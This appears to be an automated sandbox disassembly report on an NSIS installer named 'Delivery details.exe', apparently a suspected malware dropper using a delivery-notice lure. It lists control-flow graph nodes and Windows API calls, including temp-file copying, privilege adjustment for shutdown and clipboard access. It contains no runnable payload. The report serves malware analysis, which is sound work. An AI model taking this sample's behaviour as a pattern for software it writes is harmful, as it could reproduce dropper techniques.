3696 403b9d 3695->3696 3696->3693 3704 403bbe lstrlenW 3696->3704 3705 405cae CharNextW 3696->3705 3697 403c15 LoadImageW 3700 403cbb 3697->3700 3701 403c3c RegisterClassW 3697->3701 3698->3697 3699 4063d2 17 API calls 3698->3699 3699->3697 3703 40140b 2 API calls 3700->3703 3702 403c72 SystemParametersInfoW CreateWindowExW 3701->3702 3733 403cc5 3701->3733 3702->3700 3708 403cc1 3703->3708 3706 403bf2 3704->3706 3707 403bcc lstrcmpiW 3704->3707 3709 403bbb 3705->3709 3711 405c81 3 API calls 3706->3711 3707->3706 3710 403bdc GetFileAttributesW 3707->3710 3713 403d94 18 API calls 3708->3713 3708->3733 3709->3704 3712 403be8 3710->3712 3714 403bf8 3711->3714 3712->3706 3715 405ccd 2 API calls 3712->3715 3716 403cd2 3713->3716 3830 4063b0 lstrcpynW 3714->3830 3715->3706 3718 403d61 3716->3718 3719 403cde ShowWindow 3716->3719 3720 4054e7 5 API calls 3718->3720 3721 40671a 3 API calls 3719->3721 3722 403d67 3720->3722 3723 403cf6 3721->3723 3724 403d83 3722->3724 3725 403d6b 3722->3725 3726 403d04 GetClassInfoW 3723->3726 3730 40671a 3 API calls 3723->3730 3729 40140b 2 API calls 3724->3729 3732 40140b 2 API calls 3725->3732 3725->3733 3727 403d18 GetClassInfoW RegisterClassW 3726->3727 3728 403d2e DialogBoxParamW 3726->3728 3727->3728 3731 40140b 2 API calls 3728->3731 3729->3733 3730->3726 3731->3733 3732->3733 3733->3578 3734->3582 3735->3614 3736->3583 3738 4039e7 3737->3738 3739 4039dd CloseHandle 3737->3739 3740 4039f1 CloseHandle 3738->3740 3741 4039fb 3738->3741 3739->3738 3740->3741 3835 403a29 3741->3835 3744 405abe 67 API calls 3745 4037ff OleUninitialize 3744->3745 3745->3589 3745->3590 3747 405a27 3746->3747 3748 40381e ExitProcess 3747->3748 3749 405a3b MessageBoxIndirectW 3747->3749 3749->3748 3750->3623 3751->3633 3753 401389 2 API calls 3752->3753 3754 401420 3753->3754 3754->3592 3756 405ede GetTickCount GetTempFileNameW 3755->3756 3757 405f14 3756->3757 3758 403487 3756->3758 3757->3756 3757->3758 3758->3568 3759->3650 3760->3652 3761->3656 3763 402e83 3762->3763 3764 402e9b 3762->3764 3767 402e93 3763->3767 3768 402e8c DestroyWindow 3763->3768 3765 402ea3 3764->3765 3766 402eab GetTickCount 3764->3766 3769 4067c6 2 API calls 3765->3769 3766->3767 3770 402eb9 3766->3770 3767->3662 3767->3677 3796 403441 SetFilePointer 3767->3796 3768->3767 3769->3767 3771 402ec1 3770->3771 3772 402eee CreateDialogParamW ShowWindow 3770->3772 3771->3767 3797 402e56 3771->3797 3772->3767 3774 402ecf wsprintfW 3775 405414 24 API calls 3774->3775 3776 402eec 3775->3776 3776->3767 3777->3674 3779 4031e5 3778->3779 3780 4031c9 SetFilePointer 3778->3780 3800 4032c2 GetTickCount 3779->3800 3780->3779 3783 405f25 ReadFile 3784 403205 3783->3784 3785 4032c2 42 API calls 3784->3785 3792 403282 3784->3792 3786 40321c 3785->3786 3787 403288 ReadFile 3786->3787 3790 40322b 3786->3790 3786->3792 3787->3792 3789 405f25 ReadFile 3789->3790 3790->3789 3791 405f54 WriteFile 3790->3791 3790->3792 3791->3790 3792->3677 3794 405f25 ReadFile 3793->3794 3795 40343e 3794->3795 3795->3675 3796->3666 3798 402e65 3797->3798 3799 402e67 MulDiv 3797->3799 3798->3799 3799->3774 3801 4032f0 3800->3801 3802 40341a 3800->3802 3813 403441 SetFilePointer 3801->3813 3804 402e72 32 API calls 3802->3804 3809 4031ec 3804->3809 3805 4032fb SetFilePointer 3811 403320 3805->3811 3806 40342b ReadFile 3806->3811 3808 402e72 32 API calls 3808->3811 3809->3783 3809->3792 3810 405f54 WriteFile 3810->3811 3811->3806 3811->3808 3811->3809 3811->3810 3812 4033fb SetFilePointer 3811->3812 3814 40690b 3811->3814 3812->3802 3813->3805 3815 406930 3814->3815 3816 406938 3814->3816 3815->3811 3816->3815 3817 4069c8 GlobalAlloc 3816->3817 3818 4069bf GlobalFree 3816->3818 3819 406a36 GlobalFree 3816->3819 3820 406a3f GlobalAlloc 3816->3820 3817->3815 3817->3816 3818->3817 3819->3820 3820->3815 3820->3816 3822 403da8 3821->3822 3831 4062f7 wsprintfW 3822->3831 3824 403e19 3832 403e4d 3824->3832 3826 403b49 3826->3691 3827 403e1e 3827->3826 3828 4063d2 17 API calls 3827->3828 3828->3827 3829->3688 3830->3693 3831->3824 3833 4063d2 17 API calls 3832->3833 3834 403e5b SetWindowTextW 3833->3834 3834->3827 3836 403a37 3835->3836 3837 403a00 3836->3837 3838 403a3c FreeLibrary GlobalFree 3836->3838 3837->3744 3838->3837 3838->3838 4467 40190c 4468 401943 4467->4468 4469 402c37 17 API calls 4468->4469 4470 401948 4469->4470 4471 405abe 67 API calls 4470->4471 4472 401951 4471->4472 4473 401d0e 4474 402c15 17 API calls 4473->4474 4475 401d15 4474->4475 4476 402c15 17 API calls 4475->4476 4477 401d21 GetDlgItem 4476->4477 4478 40258c 4477->4478 4479 40190f 4480 402c37 17 API calls 4479->4480 4481 401916 4480->4481 4482 405a12 MessageBoxIndirectW 4481->4482 4483 40191f 4482->4483 4484 404d90 GetDlgItem GetDlgItem 4485 404de2 7 API calls 4484->4485 4494 404ffb 4484->4494 4486 404e85 DeleteObject 4485->4486 4487 404e78 SendMessageW 4485->4487 4488 404e8e 4486->4488 4487->4486 4489 404ec5 4488->4489 4493 4063d2 17 API calls 4488->4493 4491 404345 18 API calls 4489->4491 4490 4050df 4492 40518b 4490->4492 4496 404fee 4490->4496 4502 405138 SendMessageW 4490->4502 4495 404ed9 4491->4495 4497 405195 SendMessageW 4492->4497 4498 40519d 4492->4498 4499 404ea7 SendMessageW SendMessageW 4493->4499 4494->4490 4500 404cde 5 API calls 4494->4500 4518 40506c 4494->4518 4501 404345 18 API calls 4495->4501 4503 4043ac 8 API calls 4496->4503 4497->4498 4505 4051b6 4498->4505 4506 4051af ImageList_Destroy 4498->4506 4514 4051c6 4498->4514 4499->4488 4500->4518 4519 404ee7 4501->4519 4502->4496 4508 40514d SendMessageW 4502->4508 4509 405381 4503->4509 4504 4050d1 SendMessageW 4504->4490 4510 4051bf GlobalFree 4505->4510 4505->4514 4506->4505 4507 405335 4507->4496 4515 405347 ShowWindow GetDlgItem ShowWindow 4507->4515 4512 405160 4508->4512 4510->4514 4511 404fbc GetWindowLongW SetWindowLongW 4513 404fd5 4511->4513 4523 405171 SendMessageW 4512->4523 4516 404ff3 4513->4516 4517 404fdb ShowWindow 4513->4517 4514->4507 4528 404d5e 4 API calls 4514->4528 4529 405201 4514->4529 4515->4496 4536 40437a SendMessageW 4516->4536 4535 40437a SendMessageW 4517->4535 4518->4490 4518->4504 4519->4511 4522 404f37 SendMessageW 4519->4522 4524 404fb6 4519->4524 4526 404f73 SendMessageW 4519->4526 4527 404f84 SendMessageW 4519->4527 4522->4519 4523->4492 4524->4511 4524->4513 4525 405245 4530 40530b InvalidateRect 4525->4530 4534 4052b9 SendMessageW SendMessageW 4525->4534 4526->4519 4527->4519 4528->4529 4529->4525 4531 40522f SendMessageW 4529->4531 4530->4507 4532 405321 4530->4532 4531->4525 4537 404c99 4532->4537 4534->4525 4535->4496 4536->4494 4540 404bd0 4537->4540 4539 404cae 4539->4507 4542 404be9 4540->4542 4541 4063d2 17 API calls 4543 404c4d 4541->4543 4542->4541 4544 4063d2 17 API calls 4543->4544 4545 404c58 4544->4545 4546 4063d2 17 API calls 4545->4546 4547 404c6e lstrlenW wsprintfW SetDlgItemTextW 4546->4547 4547->4539 4548 401491 4549 405414 24 API calls 4548->4549 4550 401498 4549->4550 4551 402592 4552 4025c1 4551->4552 4553 4025a6 4551->4553 4555 4025f5 4552->4555 4556 4025c6 4552->4556 4554 402c15 17 API calls 4553->4554 4563 4025ad 4554->4563 4557 402c37 17 API calls 4555->4557 4558 402c37 17 API calls 4556->4558 4560 4025fc lstrlenW 4557->4560 4559 4025cd WideCharToMultiByte lstrlenA 4558->4559 4559->4563 4560->4563 4561 402629 4562 40263f 4561->4562 4564 405f54 WriteFile 4561->4564 4563->4561 4563->4562 4565 405f83 5 API calls 4563->4565 4564->4562 4565->4561 4566 404493 lstrlenW 4567 4044b2 4566->4567 4568 4044b4 WideCharToMultiByte 4566->4568 4567->4568 4569 404814 4570 404840 4569->4570 4571 404851 4569->4571 4630 4059f6 GetDlgItemTextW 4570->4630 4573 40485d GetDlgItem 4571->4573 4575 4048bc 4571->4575 4579 404871 4573->4579 4574 40484b 4576 406644 5 API calls 4574->4576 4580 4063d2 17 API calls 4575->4580 4590 4049a0 4575->4590 4628 404b4f 4575->4628 4576->4571 4578 404885 SetWindowTextW 4582 404345 18 API calls 4578->4582 4579->4578 4584 405d2c 4 API calls 4579->4584 4586 404930 SHBrowseForFolderW 4580->4586 4581 4049d0 4587 405d89 18 API calls 4581->4587 4588 4048a1 4582->4588 4583 4043ac 8 API calls 4589 404b63 4583->4589 4585 40487b 4584->4585 4585->4578 4594 405c81 3 API calls 4585->4594 4586->4590 4591 404948 CoTaskMemFree 4586->4591 4592 4049d6 4587->4592 4593 404345 18 API calls 4588->4593 4590->4628 4632 4059f6 GetDlgItemTextW 4590->4632 4595 405c81 3 API calls 4591->4595 4633 4063b0 lstrcpynW 4592->4633 4596 4048af 4593->4596 4594->4578 4597 404955 4595->4597 4631 40437a SendMessageW 4596->4631 4600 40498c SetDlgItemTextW 4597->4600 4605 4063d2 17 API calls 4597->4605 4600->4590 4601 4048b5 4603 40678a 5 API calls 4601->4603 4602 4049ed 4604 40678a 5 API calls 4602->4604 4603->4575 4611 4049f4 4604->4611 4606 404974 lstrcmpiW 4605->4606 4606->4600 4609 404985 lstrcatW 4606->4609 4607 404a35 4634 4063b0 lstrcpynW 4607->4634 4609->4600 4610 404a3c 4612 405d2c 4 API calls 4610->4612 4611->4607 4615 405ccd 2 API calls 4611->4615 4617 404a8d 4611->4617 4613 404a42 GetDiskFreeSpaceW 4612->4613 4616 404a66 MulDiv 4613->4616 4613->4617 4615->4611 4616->4617 4618 404afe 4617->4618 4620 404c99 20 API calls 4617->4620 4619 404b21 4618->4619 4621 40140b 2 API calls 4618->4621 4635 404367 KiUserCallbackDispatcher 4619->4635 4622 404aeb 4620->4622 4621->4619 4624 404b00 SetDlgItemTextW 4622->4624 4625 404af0 4622->4625 4624->4618 4627 404bd0 20 API calls 4625->4627 4626 404b3d 4626->4628 4629 40476d SendMessageW 4626->4629 4627->4618 4628->4583 4629->4628 4630->4574 4631->4601 4632->4581 4633->4602 4634->4610 4635->4626 4636 401c19 4637 402c15 17 API calls 4636->4637 4638 401c20 4637->4638 4639 402c15 17 API calls 4638->4639 4640 401c2d 4639->4640 4641 402c37 17 API calls 4640->4641 4643 401c42 4640->4643 4641->4643 4642 401c52 4644 401ca9 4642->4644 4645 401c5d 4642->4645 4643->4642 4646 402c37 17 API calls 4643->4646 4648 402c37 17 API calls 4644->4648 4647 402c15 17 API calls 4645->4647 4646->4642 4649 401c62 4647->4649 4650 401cae 4648->4650 4651 402c15 17 API calls 4649->4651 4652 402c37 17 API calls 4650->4652 4653 401c6e 4651->4653 4654 401cb7 FindWindowExW 4652->4654 4655 401c99 SendMessageW 4653->4655 4656 401c7b SendMessageTimeoutW 4653->4656 4657 401cd9 4654->4657 4655->4657 4656->4657 4658 402a9a SendMessageW 4659 402ab4 InvalidateRect 4658->4659 4660 402abf 4658->4660 4659->4660 4661 40281b 4662 402821 4661->4662 4663 402829 FindClose 4662->4663 4664 402abf 4662->4664 4663->4664 4665 40149e 4666 4022f1 4665->4666 4667 4014ac PostQuitMessage 4665->4667 4667->4666 4675 4029a2 4676 402c15 17 API calls 4675->4676 4677 4029a8 4676->4677 4678 4029e8 4677->4678 4679 4029cf 4677->4679 4683 402885 4677->4683 4681 402a02 4678->4681 4682 4029f2 4678->4682 4680 4029d4 4679->4680 4688 4029e5 4679->4688 4689 4063b0 lstrcpynW 4680->4689 4685 4063d2 17 API calls 4681->4685 4684 402c15 17 API calls 4682->4684 4684->4688 4685->4688 4688->4683 4690 4062f7 wsprintfW 4688->4690 4689->4683 4690->4683 3530 4015a3 3531 402c37 17 API calls 3530->3531 3532 4015aa SetFileAttributesW 3531->3532 3533 4015bc 3532->3533 4691 4028a7 4692 402c37 17 API calls 4691->4692 4693 4028b5 4692->4693 4694 4028cb 4693->4694 4695 402c37 17 API calls 4693->4695 4696 405e7d 2 API calls 4694->4696 4695->4694 4697 4028d1 4696->4697 4719 405ea2 GetFileAttributesW CreateFileW 4697->4719 4699 4028de 4700 402981 4699->4700 4701 4028ea GlobalAlloc 4699->4701 4704 402989 DeleteFileW 4700->4704 4705 40299c 4700->4705 4702 402903 4701->4702 4703 402978 CloseHandle 4701->4703 4720 403441 SetFilePointer 4702->4720 4703->4700 4704->4705 4707 402909 4708 40342b ReadFile 4707->4708 4709 402912 GlobalAlloc 4708->4709 4710 402922 4709->4710 4711 402956 4709->4711 4713 4031ba 44 API calls 4710->4713 4712 405f54 WriteFile 4711->4712 4714 402962 GlobalFree 4712->4714 4718 40292f 4713->4718 4715 4031ba 44 API calls 4714->4715 4716 402975 4715->4716 4716->4703 4717 40294d GlobalFree 4717->4711 4718->4717 4719->4699 4720->4707 4721 40202c 4722 4020f0 4721->4722 4723 40203e 4721->4723 4725 401423 24 API calls 4722->4725 4724 402c37 17 API calls 4723->4724 4726 402045 4724->4726 4732 40224a 4725->4732 4727 402c37 17 API calls 4726->4727 4728 40204e 4727->4728 4729 402064 LoadLibraryExW 4728->4729 4730 402056 GetModuleHandleW 4728->4730 4729->4722 4731 402075 4729->4731 4730->4729 4730->4731 4741 4067f9 WideCharToMultiByte 4731->4741 4735 4020bf 4736 405414 24 API calls 4735->4736 4738 402096 4736->4738 4737 402086 4737->4738 4739 401423 24 API calls 4737->4739 4738->4732 4740 4020e2 FreeLibrary 4738->4740 4739->4738 4740->4732 4742 406823 GetProcAddress 4741->4742 4743 402080 4741->4743 4742->4743 4743->4735 4743->4737 4751 402a2f 4752 402c15 17 API calls 4751->4752 4753 402a35 4752->4753 4754 402a47 4753->4754 4755 402a6c 4753->4755 4756 402885 4753->4756 4754->4756 4759 4062f7 wsprintfW 4754->4759 4755->4756 4757 4063d2 17 API calls 4755->4757 4757->4756 4759->4756 4760 401a30 4761 402c37 17 API calls 4760->4761 4762 401a39 ExpandEnvironmentStringsW 4761->4762 4763 401a4d 4762->4763 4765 401a60 4762->4765 4764 401a52 lstrcmpW 4763->4764 4763->4765 4764->4765 3534 401db3 GetDC 3542 402c15 3534->3542 3536 401dc5 GetDeviceCaps MulDiv ReleaseDC 3537 402c15 17 API calls 3536->3537 3538 401df6 3537->3538 3539 4063d2 17 API calls 3538->3539 3540 401e33 CreateFontIndirectW 3539->3540 3541 40258c 3540->3541 3543 4063d2 17 API calls 3542->3543 3544 402c2a 3543->3544 3544->3536 4771 401735 4772 402c37 17 API calls 4771->4772 4773 40173c SearchPathW 4772->4773 4774 401757 4773->4774 4775 402835 4776 40283d 4775->4776 4777 402841 FindNextFileW 4776->4777 4779 402853 4776->4779 4778 40289a 4777->4778 4777->4779 4781 4063b0 lstrcpynW 4778->4781 4781->4779 4782 4014b8 4783 4014be 4782->4783 4784 401389 2 API calls 4783->4784 4785 4014c6 4784->4785 4786 406aba 4792 40693e 4786->4792 4787 4072a9 4788 4069c8 GlobalAlloc 4788->4787 4788->4792 4789 4069bf GlobalFree 4789->4788 4790 406a36 GlobalFree 4791 406a3f GlobalAlloc 4790->4791 4791->4787 4791->4792 4792->4787 4792->4788 4792->4789 4792->4790 4792->4791

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 0 403489-4034c6 SetErrorMode GetVersion 1 4034c8-4034d0 call 40678a 0->1 2 4034d9 0->2 1->2 8 4034d2 1->8 3 4034de-4034f2 call 40671a lstrlenA 2->3 9 4034f4-403510 call 40678a * 3 3->9 8->2 16 403521-403582 #17 OleInitialize SHGetFileInfoW call 4063b0 GetCommandLineW call 4063b0 GetModuleHandleW 9->16 17 403512-403518 9->17 24 403584-40358b 16->24 25 40358c-4035a6 call 405cae CharNextW 16->25 17->16 22 40351a 17->22 22->16 24->25 28 4035ac-4035b2 25->28 29 4036bd-4036d7 GetTempPathW call 403458 25->29 31 4035b4-4035b9 28->31 32 4035bb-4035bf 28->32 36 4036d9-4036f7 GetWindowsDirectoryW lstrcatW call 403458 29->36 37 40372f-403749 DeleteFileW call 402f14 29->37 31->31 31->32 34 4035c1-4035c5 32->34 35 4035c6-4035ca 32->35 34->35 38 4035d0-4035d6 35->38 39 403689-403696 call 405cae 35->39 36->37 54 4036f9-403729 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403458 36->54 57 4037fa-40380a call 4039cc OleUninitialize 37->57 58 40374f-403755 37->58 43 4035f1-40362a 38->43 44 4035d8-4035e0 38->44 55 403698-403699 39->55 56 40369a-4036a0 39->56 45 403647-403681 43->45 46 40362c-403631 43->46 50 4035e2-4035e5 44->50 51 4035e7 44->51 45->39 53 403683-403687 45->53 46->45 52 403633-40363b 46->52 50->43 50->51 51->43 60 403642 52->60 61 40363d-403640 52->61 53->39 62 4036a8-4036b6 call 4063b0 53->62 54->37 54->57 55->56 56->28 64 4036a6 56->64 75 403930-403936 57->75 76 403810-403820 call 405a12 ExitProcess 57->76 65 4037ea-4037f1 call 403abe 58->65 66 40375b-403766 call 405cae 58->66 60->45 61->45 61->60 70 4036bb 62->70 64->70 74 4037f6 65->74 77 4037b4-4037be 66->77 78 403768-40379d 66->78 70->29 74->57 80 4039b4-4039bc 75->80 81 403938-40394e GetCurrentProcess OpenProcessToken 75->81 85 4037c0-4037ce call 405d89 77->85 86 403826-40383a call 40597d lstrcatW 77->86 82 40379f-4037a3 78->82 83 4039c2-4039c6 ExitProcess 80->83 84 4039be 80->84 88 403950-40397e LookupPrivilegeValueW AdjustTokenPrivileges 81->88 89 403984-403992 call 40678a 81->89 90 4037a5-4037aa 82->90 91 4037ac-4037b0 82->91 84->83 85->57 99 4037d0-4037e6 call 4063b0 * 2 85->99 100 403847-403861 lstrcatW lstrcmpiW 86->100 101 40383c-403842 lstrcatW 86->101 88->89 102 4039a0-4039ab ExitWindowsEx 89->102 103 403994-40399e 89->103 90->91 95 4037b2 90->95 91->82 91->95 95->77 99->65 100->57 106 403863-403866 100->106 101->100 102->80 104 4039ad-4039af call 40140b 102->104 103->102 103->104 104->80 110 403868-40386d call 4058e3 106->110 111 40386f call 405960 106->111 116 403874-403882 SetCurrentDirectoryW 110->116 111->116 118 403884-40388a call 4063b0 116->118 119 40388f-4038b8 call 4063b0 116->119 118->119 123 4038bd-4038d9 call 4063d2 DeleteFileW 119->123 126 40391a-403922 123->126 127 4038db-4038eb CopyFileW 123->127 126->123 128 403924-40392b call 406176 126->128 127->126 129 4038ed-40390d call 406176 call 4063d2 call 405995 127->129 128->57 129->126 138 40390f-403916 CloseHandle 129->138 138->126
                                                                  APIs
                                                                  • SetErrorMode.KERNELBASE ref: 004034AC
                                                                  • GetVersion.KERNEL32 ref: 004034B2
                                                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004034E5
                                                                  • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 00403522
                                                                  • OleInitialize.OLE32(00000000), ref: 00403529
                                                                  • SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 00403545
                                                                  • GetCommandLineW.KERNEL32(00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 0040355A
                                                                  • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\Delivery details.exe",00000000,?,00000006,00000008,0000000A), ref: 0040356D
                                                                  • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Delivery details.exe",00000020,?,00000006,00000008,0000000A), ref: 00403594
                                                                    • Part of subcall function 0040678A: GetModuleHandleA.KERNEL32(?,00000020,?,004034FB,0000000A), ref: 0040679C
                                                                    • Part of subcall function 0040678A: GetProcAddress.KERNEL32(00000000,?), ref: 004067B7
                                                                  • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004036CE
                                                                  • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004036DF
                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004036EB
                                                                  • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004036FF
                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403707
                                                                  • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403718
                                                                  • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403720
                                                                  • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 00403734
                                                                    • Part of subcall function 004063B0: lstrcpynW.KERNEL32(?,?,00000400,0040355A,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063BD
                                                                  • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004037FF
                                                                  • ExitProcess.KERNEL32 ref: 00403820
                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403833
                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328), ref: 00403842
                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 0040384D
                                                                  • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Delivery details.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403859
                                                                  • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403875
                                                                  • DeleteFileW.KERNEL32(00420EE8,00420EE8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 004038CF
                                                                  • CopyFileW.KERNEL32(00438800,00420EE8,00000001,?,00000006,00000008,0000000A), ref: 004038E3
                                                                  • CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000,?,00000006,00000008,0000000A), ref: 00403910
                                                                  • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 0040393F
                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00403946
                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040395B
                                                                  • AdjustTokenPrivileges.ADVAPI32 ref: 0040397E
                                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 004039A3
                                                                  • ExitProcess.KERNEL32 ref: 004039C6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                  • String ID: "C:\Users\user\Desktop\Delivery details.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\akroterion\archmugwump$C:\Users\user\AppData\Roaming\akroterion\archmugwump\Whitrack\Hundehullets\semimanufactured$C:\Users\user\Desktop$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                  • API String ID: 2488574733-2881978681
                                                                  • Opcode ID: 4dca7ee7eefcd27b05505b3b4d38c1a9a3124073f478f39867f6758fec60c5f6
                                                                  • Instruction ID: aa49a9b5ba718b736b7abce3970f6df4d0a927ceef10040f9259c4205047f8e0
                                                                  • Opcode Fuzzy Hash: 4dca7ee7eefcd27b05505b3b4d38c1a9a3124073f478f39867f6758fec60c5f6
                                                                  • Instruction Fuzzy Hash: 3DD103B1600311ABD3206F759D45B3B3AACEB4070AF10443FF981B62D2DBBD8D558A6E
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 139 405553-40556e 140 405574-40563b GetDlgItem * 3 call 40437a call 404cb1 GetClientRect GetSystemMetrics SendMessageW * 2 139->140 141 4056fd-405704 139->141 159 405659-40565c 140->159 160 40563d-405657 SendMessageW * 2 140->160 142 405706-405728 GetDlgItem CreateThread FindCloseChangeNotification 141->142 143 40572e-40573b 141->143 142->143 146 405759-405763 143->146 147 40573d-405743 143->147 151 405765-40576b 146->151 152 4057b9-4057bd 146->152 149 405745-405754 ShowWindow * 2 call 40437a 147->149 150 40577e-405787 call 4043ac 147->150 149->146 163 40578c-405790 150->163 156 405793-4057a3 ShowWindow 151->156 157 40576d-405779 call 40431e 151->157 152->150 154 4057bf-4057c5 152->154 154->150 161 4057c7-4057da SendMessageW 154->161 164 4057b3-4057b4 call 40431e 156->164 165 4057a5-4057ae call 405414 156->165 157->150 167 40566c-405683 call 404345 159->167 168 40565e-40566a SendMessageW 159->168 160->159 169 4057e0-40580b CreatePopupMenu call 4063d2 AppendMenuW 161->169 170 4058dc-4058de 161->170 164->152 165->164 178 405685-405699 ShowWindow 167->178 179 4056b9-4056da GetDlgItem SendMessageW 167->179 168->167 176 405820-405835 TrackPopupMenu 169->176 177 40580d-40581d GetWindowRect 169->177 170->163 176->170 180 40583b-405852 176->180 177->176 181 4056a8 178->181 182 40569b-4056a6 ShowWindow 178->182 179->170 183 4056e0-4056f8 SendMessageW * 2 179->183 184 405857-405872 SendMessageW 180->184 185 4056ae-4056b4 call 40437a 181->185 182->185 183->170 184->184 186 405874-405897 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 184->186 185->179 188 405899-4058c0 SendMessageW 186->188 188->188 189 4058c2-4058d6 GlobalUnlock SetClipboardData CloseClipboard 188->189 189->170
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,00000403), ref: 004055B1
                                                                  • GetDlgItem.USER32(?,000003EE), ref: 004055C0
                                                                  • GetClientRect.USER32(?,?), ref: 004055FD
                                                                  • GetSystemMetrics.USER32(00000002), ref: 00405604
                                                                  • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405625
                                                                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405636
                                                                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405649
                                                                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405657
                                                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040566A
                                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040568C
                                                                  • ShowWindow.USER32(?,00000008), ref: 004056A0
                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004056C1
                                                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004056D1
                                                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004056EA
                                                                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004056F6
                                                                  • GetDlgItem.USER32(?,000003F8), ref: 004055CF
                                                                    • Part of subcall function 0040437A: SendMessageW.USER32(00000028,?,00000001,004041A5), ref: 00404388
                                                                  • GetDlgItem.USER32(?,000003EC), ref: 00405713
                                                                  • CreateThread.KERNELBASE(00000000,00000000,Function_000054E7,00000000), ref: 00405721
                                                                  • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00405728
                                                                  • ShowWindow.USER32(00000000), ref: 0040574C
                                                                  • ShowWindow.USER32(?,00000008), ref: 00405751
                                                                  • ShowWindow.USER32(00000008), ref: 0040579B
